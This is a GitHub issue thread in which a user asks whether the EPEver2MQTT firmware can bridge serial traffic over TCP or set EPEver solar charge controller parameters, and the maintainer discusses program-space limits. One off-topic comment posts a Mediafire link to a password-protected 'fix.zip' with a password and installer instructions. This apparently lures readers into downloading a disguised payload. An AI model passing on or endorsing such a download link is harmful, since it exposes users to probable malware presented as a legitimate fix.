### ISSUE TITLE
[HELP] Configuration of working parameters of epever (Solar Station Monitor)

### ISSUE THREAD

**Issue by miky2k** [softwarecrash/EPEver2MQTT#49]
### A clear and concise description of what the problem is.

I'm using five epever tracer and all of them is administered through a bridge (serialTCP) by  tasmota and linux host with  python  tcpmodbus client.
Sometimes i use in windows solar station monitor to change some parameters and i create  virtual com port with com2tcp.
I don't'  understand yif our firmware accept a connection to act as serialTCP bridge , or if is it possible to configure epever charge controller parameters from (webserial or HA interface).

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by softwarecrash** [comment]
actual only output control settings are supported 
https://github.com/softwarecrash/EPEver2MQTT/wiki/Output-Control

**Comment by miky2k** [comment]
Add  access to serial stream  through tcp port is feasible ? For configuration purpose.

**Comment by softwarecrash** [comment]
> Add access to serial stream through tcp port is feasible ? For configuration purpose.

not as simple as its sounds, detection is tcp brdige open-disable the workers or build a switching for it... the main problem is the tcp bridges librarys are all verry big and need a lot of cpu time, but the epever project is near the limits without loosing functions like webOTA and other. 
added it to ideas to check it later, at the moment i doenst have the time for it, must check if it makeable with the prog space

**Comment by miky2k** [comment]
>  but the epever project is near the limits without loosing functions like webOTA and other. 

I use tasmota with tcpbridge,modubus,OTA,Webserver,MQTT, SSL and TLS and other peripherals stuff at same time in the same soc, i fell is not a problem of cpu or memory but choice optimized libraries.
